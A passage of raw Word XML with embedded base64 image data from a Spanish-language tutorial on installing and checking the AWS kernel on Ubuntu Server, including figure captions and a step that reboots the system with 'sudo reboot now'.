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me0SuYAwAAJAgAAA4AAAAA&#10;AAAAAAAAAAAAOgIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhAAkDq851QAAAdUAAABQA&#10;AAAAAAAAAAAAAAAA/gUAAGRycy9tZWRpYS9pbWFnZTEucG5nUEsBAi0AFAAGAAgAAAAhALcbh9Th&#10;AAAACQEAAA8AAAAAAAAAAAAAAAAApUYAAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQCq&#10;Jg6+vAAAACEBAAAZAAAAAAAAAAAAAAAAALNHAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsF&#10;BgAAAAAGAAYAfAEAAKZIAAAAAA==&#10;">
                <v:shape id="Imagen 13" o:spid="_x0000_s1062" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:32321;height:17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ZhxywAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/LasJA&#10;FIb3hb7DcArudJKCt+gopWKxKNQbhOxOM6dJaOZMzEw1vn1nUejy57/xzZedqcWVWldZVhAPIhDE&#10;udUVFwrOp3V/AsJ5ZI21ZVJwJwfLxePDHBNtb3yg69EXIoywS1BB6X2TSOnykgy6gW2Ig/dlW4M+&#10;yLaQusVbGDe1fI6ikTRYcXgosaHXkvLv449RsN1/ZpePzLyt7jKedOnYbd7TnVK9p+5lBsJT5//D&#10;f+2NVjCKxsN4OI0DREAKOCAXvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAuVZhxywAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;">
                  <v:imagedata r:id="rId120" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1063" type="#_x0000_t202" style="position:absolute;left:33642;top:7591;width:20345;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vHfzgAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NTsMw&#10;EITvlfoO1iJxqagT6A+EulVVgUS5VIReuK3ibZwSryPbacPb4wMSx92dnZlvtRlsKy7kQ+NYQT7N&#10;QBBXTjdcKzh+vt49gggRWWPrmBT8UIDNejxaYaHdlT/oUsZaJBMOBSowMXaFlKEyZDFMXUecbifn&#10;LcY0+lpqj9dkblt5n2ULabHhlGCwo52h6rvsrYLD7OtgJv3p5X07e/D7Y79bnOtSqdubYfsMItIQ&#10;/8V/32861Z/ny2U2z58SRWJKC5DrXwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9Cxb&#10;vwAAABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAsIvHf&#10;zgAAAOMAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA&#10;AgMAAAAA&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="0D5E25DB" w14:textId="52F05F0A" w:rsidR="00C04AFA" w:rsidRPr="004933D7" w:rsidRDefault="00C04AFA" w:rsidP="00C04AFA">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>15</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="48" w:name="_Toc155782582"/>
                        <w:r w:rsidRPr="004B562F">
                          <w:t>Comprobando que el kernel aún no está instalado.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="48"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Como hemos indicado anteriormente, es necesario reiniciar el sistema para que el kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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9B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instalado se utilice en el Sistema operativo, procederemos a ejecutar el comando </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="004139F5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo reboot now</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para realizar esta acción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CD294F" w14:textId="57BC6890" w:rsidR="003E619D" w:rsidRPr="009B1250" w:rsidRDefault="002F18FA" w:rsidP="003E619D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F8D87C5" wp14:editId="0AA519D4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-62230</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2094865</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5416550" cy="2138045"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1923382165" name="Grupo 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5416550" cy="2138045"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5417029" cy="2138525"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="947050820" name="Grupo 18"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5417029" cy="1819910"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="5390231" cy="1783715"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="1016995222" name="Imagen 16" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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55215" cy="1783715"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="445116463" name="Imagen 17" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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2380966" y="199290"/>
                              <a:ext cx="3009265" cy="1492250"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                      </wpg:grpSp>
                      <wps:wsp>
                        <wps:cNvPr id="1167886160" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1854680"/>
                            <a:ext cx="5391150" cy="283845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="729C0E31" w14:textId="1DA11EF1" w:rsidR="00A54B94" w:rsidRPr="00256D2C" w:rsidRDefault="00A54B94" w:rsidP="00A54B94">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>16</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="49" w:name="_Toc155782583"/>
                              <w:r w:rsidRPr="006417B9">
                                <w:t>Reiniciando Ubuntu Server y comprobando funcionamiento kernel AWS.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F8D87C5" id="Grupo 6" o:spid="_x0000_s1064" style="position:absolute;left:0;text-align:left;margin-left:-4.9pt;margin-top:164.95pt;width:426.5pt;height:168.35pt;z-index:251719680;mso-width-relative:margin" coordsize="54170,21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